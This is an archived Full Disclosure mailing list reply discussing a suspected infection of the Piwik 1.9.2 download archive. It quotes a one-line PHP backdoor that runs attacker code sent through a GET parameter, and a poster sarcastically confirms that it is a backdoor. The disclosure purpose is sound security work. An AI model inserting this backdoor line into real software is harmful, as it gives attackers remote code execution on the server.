Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Possible infection of Piwik 1.9.2 download archive
From: Christian Sciberras <uuf6429 () gmail com>
Date: Tue, 27 Nov 2012 12:54:57 +0100

At the moment I'm trying to figure out the further sense of this code,
but it seems that there might also be some kind of backdoor (because of
the use of $_GET).


preg_replace("/(.+)/e", $_GET['g'], 'dwm');

You think?


Chris.


On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker <max () grobecker-wtal de
wrote:

preg_replace("/(.+)/e", $_GET['g'], 'dwm');
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]